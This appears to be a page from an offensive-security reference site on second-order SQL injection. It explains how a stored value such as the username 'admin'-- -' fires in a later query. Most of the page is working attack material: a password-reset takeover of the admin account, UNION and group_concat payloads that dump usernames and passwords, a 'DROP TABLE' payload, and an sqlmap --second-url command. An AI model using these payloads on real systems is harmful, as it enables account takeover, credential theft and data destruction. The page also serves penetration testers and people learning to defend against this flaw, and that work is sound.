Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Payload is stored in the database (registration, profile update) and executed later when another feature reads and uses it in a SQL query without sanitization. Input is sanitized on insert but not on retrieval.

How It Works

1. Attacker registers username: admin'-- -
2. Application stores it safely (parameterized INSERT)
3. Later, application uses stored username in another query:
   SELECT * FROM users WHERE username='admin'-- -'
4. Injection triggers on the second query

Common Injection Points

Store HereTriggers Here
UsernameProfile page, password reset, admin panel
EmailNotification system, search, export
AddressOrder processing, invoice generation
CommentAdmin review panel, moderation page
FilenameFile listing, download feature

Example — Password Reset

Register

Username: admin'-- -
Password: anything

Trigger — Change Password

Application runs: 
UPDATE users SET password='newpass' WHERE username='admin'-- -'
Result: admin password changed to newpass.

Example — Profile Update

Register

Username: ' UNION SELECT username,password FROM users-- -

Trigger

Application displays profile with: 
SELECT bio FROM profiles WHERE username='' UNION SELECT username,password FROM users-- -'

Example — Data Exfiltration

Store

Name: ' OR 1=1 UNION SELECT group_concat(username,0x3a,password) FROM users-- -

Trigger

Appears on admin dashboard, export CSV, or email notification that renders the stored value in a query.

Testing Methodology

  1. Identify all input fields that store data
  2. Inject payloads in each field (registration, profile, settings)
  3. Navigate to every feature that reads those fields
  4. Monitor for SQL errors or unexpected data
  5. Check admin panels, reports, search, export features

Useful Payloads

admin'-- -
admin' AND 1=1-- -
admin' UNION SELECT NULL-- -
' OR '1'='1
test'); DROP TABLE temp;-- -

SQLmap Second-Order

sqlmap -r request.txt --second-url="http://TARGET/profile" --batch
--second-url = page where stored payload is triggered.

Quick Reference

StepAction
StoreInject payload via registration/profile/settings
TriggerVisit page that queries stored data
Password resetRegister as admin'-- -, change password
SQLmap--second-url="http://TARGET/trigger-page"

Sources